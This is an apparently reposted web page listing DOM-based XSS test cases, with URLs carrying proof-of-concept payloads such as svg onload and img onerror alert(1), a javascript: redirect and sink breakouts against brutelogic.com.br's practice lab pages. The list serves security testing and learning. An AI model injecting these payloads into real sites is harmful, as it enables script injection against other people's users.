DOM-based XSS Test Cases - APT-101 - 技术经验 - W3xue

技术经验

手册 / 书籍

经验首页前端设计程序设计 Java相关移动开发数据库/运维软件/图像大数据/云计算其他经验

当前位置：技术经验 » 其他 » 网络安全 » 查看文章

DOM-based XSS Test Cases - APT-101

来源：cnblogs　　作者：APT-101　　时间：2019/4/18 8:41:21　　对本文有异议

Case 23 - DOM Injection via URL parameter (by server + client)

https://brutelogic.com.br/dom/dom.php?p=Hello.<svg onload=alert(1)>

https://brutelogic.com.br/dom/dom.php?p=<img src=x onerror=alert(1)>

Case 24 - DOM Injection via URL Parameter (Document Sink)

https://brutelogic.com.br/dom/sinks.html?name=KNOXSS'<svg onload=alert(1)>

https://brutelogic.com.br/dom/sinks.html?name=<img src=x onerror=alert(1)>

Case 25 - DOM Injection via Open Redirection (Location Sink)

https://brutelogic.com.br/dom/sinks.html?redir=javascript:alert(1)

Case 26 - DOM Injection via URL Parameter (Execution Sink)

https://brutelogic.com.br/dom/sinks.html?index='NASDAQ<svg onload=alert(1)>'

https://brutelogic.com.br/dom/sinks.html?index='NASDAQ';alert(1);

参考：

https://brutelogic.com.br/knoxss.html

https://xz.aliyun.com/t/4283

原文链接：http://www.cnblogs.com/hack404/p/10724449.html

友情链接：直通硅谷　点职佳　北美留学生论坛

网络安全热门文章

AI: Web: 2 Vulnhub Walkthrough - APT-101

各类黑客大马默认密码后门

蓝凌OA前台任意文件读取漏洞利用

银河麒麟SP2 auditd服务内存泄露问题

confluence 挖矿木马应急响应 - APT-101

信息安全题目整理（1）

时间同步（NTP/PTP）技术原理介绍

apache log4j2 漏洞复现linux【纯详版】

Kali proxychains

使用tor实现对网络的匿名访问

网络安全推荐文章

异构数据源数据同步 → 从源码分析 DataX 敏感信息的加解密

FFmpeg开发笔记（三十八）APP如何访问SRS推流的RTMP直播地址

劫持TLS绕过canary && 堆和栈的灵活转换

第二届黄河流域网络安全技能挑战赛Web_wirteup

深入理解高级加密标准（Advanced Encryption Standard）

渗透测试-信息收集

RC4Drop加密技术：原理、实践与安全性探究

知名压缩软件 xz 被植入后门，黑客究竟是如何做到的？

《熬夜整理》保姆级系列教程-玩转Wireshark抓包神器教程(1)-初识Wireshark - 北京-宏哥

本站QQ群：前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试，对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们 | 意见建议 | 捐助我们 | 报错有奖 | 广告合作、友情链接（目前9元/月）请联系QQ：27243702 沸活量
皖ICP备17017327号-2　

皖公网安备34020702000426号